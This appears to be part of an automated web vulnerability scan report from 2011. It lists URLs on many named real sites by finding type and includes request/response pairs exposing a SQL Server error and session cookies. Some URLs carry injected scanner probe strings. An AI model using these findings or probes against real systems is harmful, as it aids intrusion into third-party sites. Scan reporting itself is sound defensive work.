24.59. http://www.eset.com/us/business/products
24.60. http://www.eset.com/us/business/server-security/linux-file
24.61. http://www.eset.com/us/home/smart-security
24.62. http://www.eset.com/us/store
24.63. http://www.eset.com/us/styles/store-new.css
24.64. http://www.facebook.com/plugins/like.php
24.65. http://www.hackerguardian.com/
24.66. http://www.hackerguardian.com/javascript/functions.js
24.67. http://www.integritydefender.com/
24.68. http://www.integritydefender.com/about.php
24.69. http://www.integritydefender.com/account.php
24.70. http://www.integritydefender.com/buyerDetails.php
24.71. http://www.integritydefender.com/contact.php
24.72. http://www.integritydefender.com/faq.php
24.73. http://www.integritydefender.com/personal.php
24.74. http://www.integritydefender.com/privacy.php
24.75. http://www.internetreputationmanagement.com/
24.76. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif
24.78. http://www.iveco-ptc.spb.ru/
24.79. http://www.iveco-ptc.spb.ru/favicon.ico
24.81. http://www.kronos.com/about/about-kronos.aspx
24.82. http://www.livejournal.com/
24.83. http://www.manageengine.com/me_partners.html
24.85. http://www.manageengine.com/products/security-manager/
24.86. http://www.manageengine.com/products/security-manager/download.html
24.87. http://www.manageengine.com/products/security-manager/store.html
24.88. https://www.manageengine.com/network-performance-management.html
24.89. https://www.manageengine.com/products/security-manager/index.html
24.90. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
24.91. http://www.netdiligence.com/
24.92. http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
24.93. http://www.outpost24.com/
24.94. http://www.outpost24.com/products.html
24.95. http://www.reputationchanger.com/
24.96. http://www.reputationchanger.com/scheduled.html
24.97. http://www.ripoffreport.com/
24.98. http://www.ripoffreport.com/ConsumerResources.aspx
24.99. http://www.ripoffreport.com/CorporateAdvocacy.aspx
24.100. http://www.ripoffreport.com/LoginPage.aspx
24.101. http://www.stillsecure.com/company/testimonials.php
24.102. http://www.stillsecure.com/library/
24.103. http://www.stillsecure.com/m/
24.104. http://www.stillsecure.com/products.php
24.105. http://www.stillsecure.com/services/index.php
24.106. http://www.stillsecure.com/vam/
24.107. http://www.tresware.com/Static-contact.html
24.108. http://www.trust-guard.com/PCI-scanning-s/39.htm
24.109. http://www.trust-guard.com/contact-trust-guard-s/4.htm
26.2. http://games.webalta.ru/
26.3. http://pixel.fetchback.com/
26.4. http://pixel.rubiconproject.com/
26.5. http://pl.yumenetworks.com/
26.6. http://playaudiomessage.com/
26.7. http://player.vimeo.com/
26.8. https://store.manageengine.com/
26.9. http://widgets.digg.com/
26.10. http://www.igotyourindex.com/
26.11. http://www.instantengage.com/
26.12. http://www.integritydefender.com/
26.14. https://www.manageengine.com/
26.15. http://www.reputationprofessor.com/
26.17. http://www.stillsecure.com/
26.18. http://www.tresware.com/
27.1. http://api.flickr.com/services/feeds/photos_public.gne
27.2. http://customer.kronos.com/EdServices/tooltip.js
27.3. http://direct.yandex.ru/
27.4. https://hourly.deploy.com/hmc/report/
27.5. https://hourly.deploy.com/hmc/report/index.cfm
27.6. http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js
27.7. http://l-stat.livejournal.com/js/
27.8. http://learn.shavlik.com/shavlik/
27.9. http://learn.shavlik.com/shavlik/download.cfm
27.10. http://learn.shavlik.com/shavlik/index.cfm
27.12. https://secure.trust-guard.com/ResetPassword.php
27.13. http://solutions.kronos.com/forms/experience2011
27.14. https://support.trust-guard.com/index.php
27.15. http://tengrinews.kz/static/js/browserTouchSupport.js
27.16. http://tengrinews.kz/static/js/jquery.cookie.js
27.17. http://tools.manageengine.com/forums/me/forum.php
27.18. http://tools.manageengine.com/forums/security-manager/forum.php
27.19. http://www.criticalwatch.com/company/critical-watch-career.aspx
27.20. http://www.criticalwatch.com/company/critical-watch-contact.aspx
27.21. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
27.22. http://www.criticalwatch.com/support/critical-watch-support.aspx
27.23. http://www.customermagnetism.com/
27.24. http://www.customermagnetism.com/case-studies/
27.25. http://www.customermagnetism.com/free-consultation/
27.26. http://www.customermagnetism.com/pay-per-click-services/
27.27. http://www.customermagnetism.com/seo-faq/
27.28. http://www.depthsecurity.com/
27.29. http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
27.30. https://www.depthsecurity.com/company.aspx
27.31. https://www.depthsecurity.com/contact-us.aspx
27.32. https://www.depthsecurity.com/professional-services.aspx
27.33. https://www.depthsecurity.com/services.aspx
27.34. http://www.dmca.com/Protection/Status.aspx
27.35. http://www.gartner.com/technology/contact/become-a-client.jsp
27.36. http://www.gartner.com/technology/contact/contact_gartner.jsp
27.37. http://www.instantengage.com/open_chat.php
27.38. http://www.integritydefender.com/
27.39. http://www.integritydefender.com/about.php
27.40. http://www.integritydefender.com/account.php
27.41. http://www.integritydefender.com/buyerDetails.php
27.42. http://www.integritydefender.com/contact.php
27.43. http://www.integritydefender.com/faq.php
27.44. http://www.integritydefender.com/js/adminJavaScript.js
27.45. http://www.integritydefender.com/js/contactUs.js
27.46. http://www.integritydefender.com/personal.php
27.47. http://www.integritydefender.com/privacy.php
27.48. http://www.kayako.com/js/cookie.js
27.49. http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
27.50. http://www.manageengine.com/me_partners.html
27.51. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
27.52. http://www.myreputationmanager.com/
27.53. http://www.myreputationmanager.com/faq.html
27.54. http://www.myreputationmanager.com/request_analysis.html
27.55. http://www.myreputationmanager.com/script/jsvalidations.js
27.56. http://www.netsuite.com/portal/javascript/DD_roundies.js
27.57. http://www.praetorian.com/contactus.html
27.58. http://www.removeyourname.com/company/contact.html
27.59. http://www.reputationprofessor.com/
27.60. http://www.ripoffreport.com/
27.61. http://www.ripoffreport.com/Common/script/jquery.hoverIntent.js
27.62. http://www.ripoffreport.com/ConsumerResources.aspx
27.63. http://www.ripoffreport.com/CorporateAdvocacy.aspx
27.64. http://www.ripoffreport.com/LoginPage.aspx
27.65. http://www.smpone.com/Static-contact.html
27.66. http://www.smpone.com/javascript/common.php
27.67. http://www.stillsecure.com/m/
27.68. http://www.supportskins.com/favicon.ico
27.69. http://www.tresware.com/javascript/bbcode.php
27.70. http://www.tresware.com/javascript/common.php
27.71. http://www.trucklist.ru/cars/&rnd=7005287
27.72. http://www.trucklist.ru/cars/trucks
27.73. http://www.trucklist.ru/cars/undefined
27.74. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js
28. Private IP addresses disclosed
28.1. http://api.facebook.com/restserver.php
28.2. http://games.mochiads.com/c/g/moon-volley/mvolley.swf
28.3. http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf
28.4. http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf
28.5. http://my.webalta.ru/public/engine/settings.js
28.6. http://player.vimeo.com/video/22043447
28.7. http://static.ak.fbcdn.net/connect/xd_proxy.php
28.8. http://static.ak.fbcdn.net/connect/xd_proxy.php
28.9. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png
28.10. http://tools.manageengine.com/forums/me/forum.php
28.11. http://tools.manageengine.com/forums/security-manager/forum.php
28.12. https://www.controlscan.com/checkout.php
28.13. http://www.facebook.com/plugins/like.php
28.14. http://www.facebook.com/plugins/like.php
28.15. http://www.facebook.com/plugins/like.php
28.16. http://www.facebook.com/plugins/like.php
28.17. http://www.facebook.com/plugins/like.php
28.18. http://www.google.com/sdch/rU20-FBA.dct
29. Credit card numbers disclosed
29.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout
29.3. http://www.kronos.com/email/c/agendalcc11-full.pdf
30.1. http://945075.r.msn.com/
30.3. http://ad.doubleclick.net/adj/lj.homepage/loggedout
30.4. http://ajax.googleapis.com/ajax/services/feed/load
30.5. http://api.facebook.com/restserver.php
30.6. http://api.flickr.com/services/feeds/photos_public.gne
30.7. http://apnxscm.ac3.msn.com:81/CACMSH.ashx
30.8. http://b.voicefive.com/b
30.9. http://b2bcontext.ru/services/advertisement/getblock
30.10. http://beacon.securestudies.com/scripts/beacon.dll
30.13. http://cache.fimservecdn.com/contents/260/863/863260/lmb-15598-32799-48501.swf
30.14. https://checkout.netsuite.com/robots.txt
30.15. http://clients1.google.com/complete/search
30.16. http://d1.openx.org/ajs.php
30.17. http://d7.zedo.com/img/bh.gif
30.18. http://demr.opt.fimserve.com/adopt/
30.19. http://desk.opt.fimserve.com/adopt/
30.20. http://direct.yandex.ru/
30.22. http://fonts.googleapis.com/css
30.23. http://forums.comodo.com/rss.php
30.24. http://forums.manageengine.com/fbw
30.25. http://games.mochiads.com/c/g/moon-volley/mvolley.swf
30.26. http://goods.adnectar.com/analytics/get_avia_js
30.27. http://goods43.adnectar.com/analytics/record_impression
30.28. http://googleads.g.doubleclick.net/pagead/ads
30.29. http://i2.duck.co/i/xss.cx.ico
30.30. http://ideco-software.ru/products/ims/
30.31. http://imagesrv.gartner.com/cio/css/main.css
30.32. http://img.en25.com/Web/KronosIncorporated/kronos-ga.js
30.33. http://ioerror.us/bb2-support-key
30.34. http://map.media6degrees.com/orbserv/aopix
30.35. http://maps.google.com/maps
30.36. http://mbox5.offermatica.com/m2/netsuite/mbox/standard
30.37. http://netsuite-www.baynote.net/baynote/customerstatus2
30.38. http://odnoklassniki.ru/
30.39. http://partner-support.wiki.zoho.com/
30.40. http://pixel.fetchback.com/serve/fb/pdc
30.41. http://pixel.quantserve.com/pixel
30.42. http://playaudiomessage.com/play.asp
30.43. http://player.vimeo.com/video/22043447
30.45. http://r2.mail.ru/b13057590.swf
30.46. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif
30.47. http://rs.mail.ru/d292152.gif
30.48. http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf
30.50. http://safebrowsing.clients.google.com/safebrowsing/downloads
30.51. http://search.twitter.com/search.json
30.52. http://segment-pixel.invitemedia.com/pixel
30.53. http://solutions.kronos.com/content/experience2011
30.54. http://tengrinews.kz/tag/891/
30.55. http://themes.googleusercontent.com/font
30.56. http://toolbarqueries.clients.google.com/tbproxy/af/query
30.57. http://tools.manageengine.com/forums/security-manager/forum.php
30.58. http://track.pulse360.com/cgi-bin/tracker.cgi
30.59. http://translate.google.com/translate_a/element.js
30.60. http://translate.googleapis.com/translate_a/t
30.61. http://widgets.digg.com/buttons/count
30.62. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif
30.63. http://www.customermagnetism.com/
30.64. http://www.dmca.com/Protection/Status.aspx
30.65. http://www.elineaccessories.com/
30.66. http://www.fiddler2.com/fiddler2/updatecheck.asp
30.67. http://www.gartner.com/DisplayDocument
30.68. http://www.google-analytics.com/__utm.gif
30.69. http://www.googleadservices.com/pagead/conversion/1072501689/
30.70. http://www.hackerguardian.com/
30.71. http://www.igotyourindex.com/igyindex.php
30.72. http://www.internetreputationmanagement.com/
30.73. http://www.iveco-ptc.spb.ru/
30.75. http://www.livejournal.com/
30.76. http://www.manageengine.com/products/security-manager/
30.77. https://www.manageengine.com/products/security-manager/index.html
30.78. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
30.79. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T
30.80. http://www.reputationprofessor.com/
30.81. http://www.ripoffreport.com/
30.82. https://www.salesforce.com/servlet/servlet.WebToLead
30.84. http://www.tresware.com/
30.85. http://www.trucklist.ru/cars/trucks
31.1. https://checkout.netsuite.com/c.438708/js/eset-netsuite.js
31.2. https://checkout.netsuite.com/c.438708/js/lib/mbox.js
31.3. https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js
31.4. https://checkout.netsuite.com/empty.html
31.5. https://checkout.netsuite.com/pages/portal/page_not_found.jsp
31.6. https://checkout.netsuite.com/robots.txt
31.7. https://checkout.netsuite.com/s.nl
31.8. https://customer.kronos.com/Default.asp
31.9. https://employer.unicru.com/asp/home/login.asp
31.10. https://forms.netsuite.com/pages/portal/page_not_found.jsp
31.11. https://hourly.deploy.com/hmc/report/
31.12. https://hourly.deploy.com/hmc/report/index.cfm
31.13. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)
31.14. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)
31.15. https://secure.trust-guard.com/certificates/Trust-Guard.com
31.16. https://secure.trust-guard.com/certificates/www.YourSite.Com
31.17. https://secure.trust-guard.com/certificates/www.yourwebsitehere.com
31.18. https://secure.trust-guard.com/searchForm.php
31.19. https://store.manageengine.com/
31.20. https://store.manageengine.com/service-desk/index.html
31.21. https://support.comodo.com/
31.22. https://support.comodo.com/index.php
31.23. https://support.trust-guard.com/
31.24. https://support.trust-guard.com/index.php
31.25. https://support.trust-guard.com/visitor/
31.26. https://support.trust-guard.com/visitor/index.php
31.27. https://system.netsuite.com/pages/customerlogin.jsp
31.28. https://www.depthsecurity.com/company.aspx
31.29. https://www.depthsecurity.com/contact-us.aspx
31.30. https://www.depthsecurity.com/professional-services.aspx
31.31. https://www.depthsecurity.com/services.aspx
31.32. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
31.33. https://www.manageengine.com/network-performance-management.html
31.34. https://www.manageengine.com/products/security-manager/index.html
31.35. https://www.manageengine.com/products/security-manager/security-manager-forum.html
31.36. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico
32. Multiple content types specified
33. HTML does not specify charset
33.1. https://customer.kronos.com/
33.2. https://customer.kronos.com/Default.asp
33.3. https://customer.kronos.com/portalproblems.asp
33.4. https://customer.kronos.com/user/forgotpassword.asp
33.5. https://customer.kronos.com/user/forgotusername.asp
33.6. https://customer.kronos.com/user/logindenied.asp
33.7. http://duckduckgo.com/post.html
33.8. https://employer.unicru.com/asp/home/login.asp
33.9. http://foreign.dt00.net/zones/zone1.php
33.10. http://foreign.dt00.net/zones/zone23.php
33.11. http://foreign.dt00.net/zones/zone25.php
33.12. http://foreign.dt00.net/zones/zone40.php
33.13. http://goods.adnectar.com/static/quantcast_1.html
33.14. http://ioerror.us/bb2-support-key
33.15. http://kino.webalta.ru/banners.xml
33.16. http://kroogy.com/favicon.ico
33.17. http://l.azjmp.com/f.php
33.18. http://my.webalta.ru/feed/l.php
33.19. http://my.webalta.ru/public/visual/themes/css.php
33.20. http://now.eloqua.com/visitor/v200/svrGP.aspx
33.21. http://playaudiomessage.com/play.asp
33.22. https://support.trust-guard.com/%22https:/
33.29. https://support.trust-guard.com/%22https:/Netsparker244fdde99d984be78ada09aa500cf940/
33.30. https://support.trust-guard.com/%22https:/support.trust-guard.com/
33.32. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/
33.34. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/
33.42. https://support.trust-guard.com/%22javascript:closeProactiveRequest_vvx8pjmw()
33.43. https://support.trust-guard.com/%22javascript:doProactiveRequest_vvx8pjmw()
33.44. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/
33.45. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/
33.46. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/')
33.49. https://support.trust-guard.com/%22javascript:void(0)
33.52. https://support.trust-guard.com/Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php
33.53. https://support.trust-guard.com/Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php
33.54. https://support.trust-guard.com/Netsparkercd451056256c40529051e01cf989486a
33.55. https://support.trust-guard.com/index.php
33.56. https://support.trust-guard.com/spicons/Netsparkerb1ba33b014ca47e191835f0abeba3f7b/
33.57. https://support.trust-guard.com/themes/Netsparker9b40ae79bd744aef87f25febd5aeb9f3/
33.65. https://support.trust-guard.com/themes/client_default/index.php
33.66. https://support.trust-guard.com/themes/client_default/space.gif/
33.67. https://support.trust-guard.com/themes/client_default/staffonline.gif/
33.68. https://support.trust-guard.com/themes/client_default/supportsuite.gif/
33.69. https://support.trust-guard.com/visitor/%22https:/
33.70. https://support.trust-guard.com/visitor/%22https:/Netsparkerd90cb1409e394c5fbfcd68771660fcc7/
33.71. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/
33.73. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/
33.83. https://support.trust-guard.com/visitor/%22javascript:closeProactiveRequest_vvx8pjmw()
33.84. https://support.trust-guard.com/visitor/%22javascript:doProactiveRequest_vvx8pjmw()
33.85. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/
33.86. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/
33.87. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/')
33.96. https://support.trust-guard.com/visitor//%22javascript:closeProactiveRequest_vvx8pjmw()
33.97. https://support.trust-guard.com/visitor//%22javascript:doProactiveRequest_vvx8pjmw()
33.98. https://support.trust-guard.com/visitor//%22javascript:startChat_vvx8pjmw(/'0/')
33.99. https://support.trust-guard.com/visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php
33.100. https://support.trust-guard.com/visitor/Netsparkerfb734a5866dc47289c8dd804175b8b26/
33.101. https://support.trust-guard.com/visitor/index.php
33.102. http://www.igotyouremail.com/igye_conversion.php
33.103. http://www.myreputationmanager.com/phpinfo.php
33.104. http://www.praetorian.com/contactus.html
33.105. http://www.praetorian.com/external-network-penetration-test.html
33.106. http://www.praetorian.com/images/fieldbg.gif
33.107. http://www.reputationchanger.com/rc.ico
33.108. http://www.reputationprofessor.com/
33.109. https://www.salesforce.com/servlet/servlet.WebToLead
33.110. http://www.smpone.com/javascript/common.php
33.111. http://www.smpone.com/javascript/image_pop.php
33.112. http://www.smpone.com/javascript/showimages.php
33.113. http://www.tresware.com/javascript/bbcode.php
33.114. http://www.tresware.com/javascript/common.php
33.115. http://www.tresware.com/javascript/edittags.php
33.116. http://www.tresware.com/javascript/image_pop.php
33.117. http://www.tresware.com/javascript/showimages.php
34. HTML uses unrecognised charset
34.1. http://b2bcontext.ru/services/advertisement/getblock
34.2. http://ideco-software.ru/products/ims/
34.6. http://vkontakte.ru/login.php
34.7. http://www.gartner.com/include/webtrends.jsp
35. Content type incorrectly stated
35.1. http://an.yandex.ru/code/47934
35.2. http://an.yandex.ru/code/57617
35.3. http://an.yandex.ru/code/66894
35.4. http://ar.voicefive.com/b/rc.pli
35.5. http://auto.webalta.ru/favicon.ico
35.6. http://auto.webalta.ru/public/css/style-auto.css
35.7. http://auto.webalta.ru/public/js/webalta.js
35.8. http://b2bcontext.ru/services/advertisement/getblock
35.9. http://css.loveplanet.ru/3/img/pda/main.js
35.10. http://direct.yandex.ru/pages/direct/_direct-1303387947.js
35.11. http://direct.yandex.ru/pages/index/_index-1303387946.js
35.12. http://duckduckgo.com/b.js
35.13. http://duckduckgo.com/o.js
35.14. http://duckduckgo.com/y.js
35.15. http://event.adxpose.com/event.flow
35.16. http://foreign.dt00.net/zones/form4.js
35.17. http://foreign.dt00.net/zones/zone1.php
35.18. http://foreign.dt00.net/zones/zone23.php
35.19. http://foreign.dt00.net/zones/zone25.php
35.20. http://foreign.dt00.net/zones/zone40.php
35.21. http://games.webalta.ru/public/css/style-games.css
35.22. http://goods.adnectar.com/analytics/get_avia_js
35.23. https://hourly.deploy.com/images/logo.jpg
35.24. http://img.webalta.ru/public/css/style.css
35.25. http://img.webalta.ru/public/js/webalta.js
35.26. http://js.dt00.net/public/smi/elastic/24.js
35.27. http://kino.webalta.ru/banners.xml
35.28. http://kino.webalta.ru/sc/l/loach.js
35.29. http://l-files.livejournal.net/userapps/10/image
35.30. http://l-files.livejournal.net/userapps/2/image
35.31. http://l-files.livejournal.net/userapps/3/image
35.32. http://l-files.livejournal.net/userapps/4/image
35.33. http://l-files.livejournal.net/userapps/9/image
35.34. http://l-files.livejournal.net/vgift/445/small
35.35. http://learn.shavlik.com/shavlik/userCheck.cfm
35.36. http://limg.imgsmail.ru/mail/ru/css/search_top.css
35.37. http://mbox9e.offermatica.com/m2/eset/mbox/standard
35.38. http://my.webalta.ru/feed/l.php
35.39. http://my.webalta.ru/public/engine/app.js
35.40. http://my.webalta.ru/public/engine/catalog/general.txt
35.41. http://my.webalta.ru/public/engine/fw/fw_cookies.js
35.42. http://my.webalta.ru/public/engine/move.js
35.43. http://my.webalta.ru/public/engine/page.js
35.44. http://my.webalta.ru/public/engine/reader.js
35.45. http://my.webalta.ru/public/engine/settings.js
35.46. http://my.webalta.ru/public/engine/skinpacks.js
35.47. http://my.webalta.ru/public/engine/templates.js
35.48. http://my.webalta.ru/public/engine/widget/browse/widget_script.js
35.49. http://my.webalta.ru/public/engine/widget/flash/widget_script.js
35.50. http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js
35.51. http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js
35.52. http://my.webalta.ru/public/visual/index.css
35.53. http://my.webalta.ru/public/visual/theme.css
35.54. http://my.webalta.ru/public/visual/themes/css.php
35.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
35.56. http://now.eloqua.com/visitor/v200/svrGP.aspx
35.57. http://pogoda.webalta.ru/favicon.ico
35.58. http://pogoda.webalta.ru/public/css/style-weather.css
35.59. http://pogoda.webalta.ru/public/js/search.js
35.60. http://secure.comodo.com/products/guessregion
35.61. http://server.iad.liveperson.net/hcp/html/mTag.js
35.62. http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg
35.63. https://support.trust-guard.com/Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php
35.64. https://support.trust-guard.com/Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php
35.65. https://support.trust-guard.com/index.php
35.67. https://support.trust-guard.com/themes/client_default/index.php
35.68. https://support.trust-guard.com/themes/client_default/staffonline.gif
35.69. https://support.trust-guard.com/visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php
35.70. https://support.trust-guard.com/visitor/index.php
35.71. http://tengrinews.kz/static/js/remainNY.js
35.72. http://track.pulse360.com/cgi-bin/tracker.cgi
35.73. http://translate.googleapis.com/translate_a/t
35.74. http://vkontakte.ru/js/lang0_0.js
35.75. http://www.eset.com/us/scripts/business.js
35.76. http://www.eset.com/us/scripts/common.js
35.77. http://www.eset.com/us/scripts/elqNow/elqCfg.js
35.78. http://www.eset.com/us/scripts/elqNow/elqImg.js
35.79. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js
35.80. http://www.eset.com/us/scripts/lib/jq-promo-lib.js
35.81. http://www.eset.com/us/scripts/lib/jq.js
35.82. http://www.eset.com/us/scripts/lib/mbox.js
35.83. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js
35.84. http://www.eset.com/us/scripts/lib/s_code3.js
35.85. http://www.eset.com/us/scripts/store.js
35.86. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
35.87. http://www.gartner.com/include/webtrends.jsp
35.88. http://www.gartner.com/technology/include/metricsHelper.jsp
35.89. http://www.google.com/search
35.90. http://www.integritydefender.com/dateTimePicker/anytimejz.js
35.91. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/favicon.ico
35.92. http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif
35.93. http://www.kayako.com/favicon.ico
35.94. http://www.kayako.com/images/hs-graphics/zoomin.cur
35.95. http://www.kayako.com/images/hs-graphics/zoomout.cur
35.96. http://www.livejournal.com/favicon.ico
35.97. http://www.livejournal.com/tools/endpoints/journalspotlight.bml
35.98. http://www.manageengine.com/images/bandwidth-monitoring.gif
35.99. http://www.manageengine.com/images/ip-sla-voip-monitoring.gif
35.100. http://www.manageengine.com/images/network-configuration-management.gif
35.101. http://www.manageengine.com/images/network-health-monitoring.gif
35.102. http://www.manageengine.com/images/network-mapping.gif
35.103. http://www.manageengine.com/images/traffic-analysis.gif
35.104. http://www.manageengine.com/images/wan-monitoring.gif
35.105. http://www.netsuite.com/portal/javascript/effects.js
35.106. http://www.netsuite.com/portal/javascript/prototype.js
35.107. http://www.reputationchanger.com/images/rc.ico
35.108. http://www.smpone.com/javascript/common.php
35.109. http://www.smpone.com/javascript/image_pop.php
35.110. http://www.smpone.com/javascript/showimages.php
35.111. http://www.tresware.com/javascript/bbcode.php
35.112. http://www.tresware.com/javascript/common.php
35.113. http://www.tresware.com/javascript/edittags.php
35.114. http://www.tresware.com/javascript/image_pop.php
35.115. http://www.tresware.com/javascript/showimages.php
35.116. http://www.trucklist.ru/webroot/delivery/js/scripts.js
35.117. http://www.trust-guard.com/Templates/New-Green/Images/favicon.ico
35.118. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg
35.119. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg
35.120. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg
35.121. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico
36. Content type is not specified
36.1. https://checkout.netsuite.com/server-info
36.2. https://checkout.netsuite.com/server-status
36.3. https://hourly.deploy.com/hmc/report/index.cfm
36.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard
36.5. http://partner-support.wiki.zoho.com/favicon.ico
36.6. https://secure.trust-guard.com/ResetPassword.php
36.7. https://support.trust-guard.com/index.php
36.8. https://support.trust-guard.com/visitor/index.php
37.1. https://checkout.netsuite.com/
37.2. https://forms.netsuite.com/
37.3. https://secure.trust-guard.com/
37.4. https://store.manageengine.com/
37.5. https://support.comodo.com/
37.6. https://support.trust-guard.com/
37.7. https://system.netsuite.com/
37.8. https://www.manageengine.com/
37.9. https://www.salesforce.com/
37.10. https://www.trust-guard.com/
Severity: | High |
Confidence: | Firm |
Host: | http://customer.kronos |
Path: | /user/managefavorites.asp |
GET /user/managefavorites.asp Host: customer.kronos.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1306330437105%26vn Referer: http://www.google.com |
HTTP/1.1 500 Internal Server Error Date: Mon, 25 Apr 2011 15:34:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 5466 Content-Type: text/html Expires: Tue, 01 Jan 1980 06:00:00 GMT Set-Cookie: KronosCust=LogIn=false; path=/ Set-Cookie: ASPSESSIONIDQASQRRDR Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <SCRIPT language="JavaScript"> <!-- function verify(url) { if (confirm("Are you sure?")) { window.location = url; } ...[SNIP]... <font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Procedure 'getFavorites' expects parameter '@UserID', which was not supplied.</font> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://learn.shavlik.com |
Path: | /shavlik/index.cfm |
GET /shavlik/index.cfm?m=521 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631 |
HTTP/1.1 200 OK Connection: close Date: Mon, 25 Apr 2011 12:47:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 ...[SNIP]... <!-- 1334 372 --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Shavlik Free Antivirus Software Download</title> <link rel="stylesheet" href="style/style2.css" type="text/css" media="all" /> <!--[if IE 6]> <style> #navitem a {padding-bottom:0px;} </style> <![endif]--> <script language="javascript" type="text/javascript"> function windowOpen(sURL, bFade, sWindowName) { if (bFade) { document.getElementById( } sWindowName = sWindowName || "newWindow"; nPosX = (window.screen.width/2) - (400); nPosY = (window.screen.height/2) - (350 + 75); newWindow = window.open(sURL newWindow.focus(); } var req; function docLoad(url) { req = false; // non IE if(window.XMLHttpRequest && !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } // IE } else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2 } catch(e) { try { req = new Ac ...[SNIP]... |
GET /shavlik/index.cfm?m=521 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631 |
